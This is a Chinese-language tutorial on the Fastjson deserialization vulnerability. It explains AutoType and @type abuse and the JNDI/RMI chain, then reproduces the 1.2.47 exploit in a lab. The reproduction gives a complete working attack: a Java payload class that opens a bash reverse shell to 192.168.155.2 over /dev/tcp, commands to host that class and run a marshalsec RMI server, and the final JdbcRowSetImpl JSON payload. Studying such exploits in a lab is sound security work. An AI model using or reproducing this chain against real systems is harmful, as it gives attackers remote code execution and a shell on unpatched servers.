Fastjson反序列化漏洞

一、概念

啥是json?json全称是JavaScript object notation。即JavaScript对象标记法，使用键值对进行信息的存储。
举个简单的例子如下：
{
“name”:“BossFrank”,
“age”:23,
“media”:[“CSDN”,“bilibili”,“Github”]
}
json本质就是一种字符串，用于信息的存储和交换。

二、Fastjson-历史漏洞

Fastjson <=1.2.24 反序列化远程命令执行漏洞
1.2.24：fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。
Fastjson <=1.2.41 反序列化远程命令执行漏洞
Fastjson <=1.2.42 反序列化远程命令执行漏洞
Fastjson <=1.2.43 反序列化远程命令执行漏洞
Fastjson <=1.2.45 反序列化远程命令执行漏洞
Fastjson <=1.2.47 反序列化远程命令执行漏洞
1.2.47：fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。
Fastjson <=1.2.62 反序列化远程命令执行漏洞
Fastjson <=1.2.66 反序列化远程命令执行漏洞

三、漏洞原理

假设有如下两个类

实例化对象之后，假设苹果对象的price为0.5，Apple类对象序列化为json格式后为：
{“Fruit”:{“price”:0.5}}
假设iphone对象的price为5000,序列化为json格式后为：{“Fruit”:{“price”:5000}}
当一个类只有一个接口的时候，将这个类的对象序列化的时候，就会将子类抹去（apple/iphone）
只保留接口的类型(Fruit)，最后导致反序列化时无法得到原始类型。本例中，将两个json再反序列化生成java对象的时候，无法区分原始类是apple还是iphone。

为了解决上述问题： fastjson引入了基于属性（AutoType），即在序列化的时候，先把原始类型记录下来，使用@type的键记录原始类型。
在本例中，引入AutoType后，Apple类对象序列化为json格式后为：
{ “fruit”:{ “@type”:“com.hollis.lab.fastjson.test.Apple”, “price”:0.5 } }
引入AutoType后，iphone类对象序列化为json格式后为：
{ “fruit”:{ “@type”:“com.hollis.lab.fastjson.test.iphone”, “price”:5000 } }
这样在反序列化的时候就可以区分原始的类了。
使用AutoType功能进行序列化的JSON字符会带有一个@type来标记其字符的原始类型，在反序列化的时候会读取这个@type，来试图把JSON内容反序列化到对象，并且会调用这个库的setter或者getter方法，然而，@type的类有可能被恶意构造，只需要合理构造一个JSON，使用@type指定一个想要的攻击类库就可以实现攻击。
fastJSON在反序列化时，可能会将目标类的构造函数、getter方法、setter方法、is方法执行一遍，如果此时这四个方法中有危险操作，则会导致反序列化漏洞，也就是说攻击者传入的序列化数据中需要目标类的这些方法中要存在漏洞才能触发。
攻击者准备rmi服务和web服务，将rmi绝对路径注入到lookup方法中，受害者JNDI接口会指向攻击者控制rmi服务器，JNDI接口向攻击者控制web服务器远程加载恶意代码，执行构造函数形成RCE。
常见的有sun官方提供的一个类com.sun.rowset.JdbcRowSetImpl，其中有个dataSourceName方法，支持传入一个rmi的源，只要解析其中的url就会支持远程调用！
因此整个漏洞复现的原理过程就是：
1、攻击者（我们）访问存在fastjson漏洞的目标靶机网站，通过burpsuite抓包改包，以json格式添加com.sun.rowset.JdbcRowSetImpl恶意类信息发送给目标机。
2、存在漏洞的靶机对json反序列化时候，会加载执行我们构造的恶意信息(访问rmi服务器)，靶机服务器就会向rmi服务器请求待执行的命令。也就是靶机服务器问rmi服务器，（靶机服务器）需要执行什么命令啊？
3、rmi 服务器请求加载远程机器的class（这个远程机器是我们搭建好的恶意站点，提前将漏洞利用的代码编译得到.class文件，并上传至恶意站点），得到攻击者（我们）构造好的命令（pingdnslog或者创建文件或者反弹shell啥的）
4、rmi将远程加载得到的class（恶意代码），作为响应返回给靶机服务器。
5、靶机服务器执行了恶意代码，被攻击者成功利用。

四、Fastjson特征

fastjson的作用是用于对JSON格式的数据进行解析和打包,所以出现json格式的地方就有可能使用了

五、Fastjson1.2.47漏洞复现

影响范围 Fastjson < 1.2.48

1.搭建环境

docker-compose up -d

2.漏洞验证（利用 dnslog）

bp抓包

将Get改成Post
添加如下内容
Content-Type: application/json
Content-Length: 80

{
“a”:{
“@type”:“java.net.Inet4Address”,
“val”:“25gb44.dnslog.cn”
}
}

执行后dnslog得到回显，说明存在漏洞

3.漏洞利用

攻击流程：制作反弹Payload -> 开启HTTP服务 -> 启动LDAP服务 ->
监听EXP中端口 -> 执行Payload

1)Fastjson反弹shell

编译恶意代码，通过javac TouchFile.java 编译成class文件，将编译好的class上传至你的web服务器

import java.lang.Runtime;
import java.lang.Process;
public class payload {
static {
try {Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.155.2/1111 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}

2)启动HTTP服务器

poc：
python3 -m http.server 8089 py3
python -m SimpleHTTPServer 8088 py2
启动http服务的目的是给TouchFile.class提供下载，假如我们在浏览器直接输入url时,它就会自动下载.class文件

3)启动LDAP服务

使用marshalsec开启ldap服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.155.2:8089/#payload” 9999

4)启动shell反弹监听

5)Burp发送反弹shell

{
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.155.2:9999/payload”,
“autoCommit”:true
}
}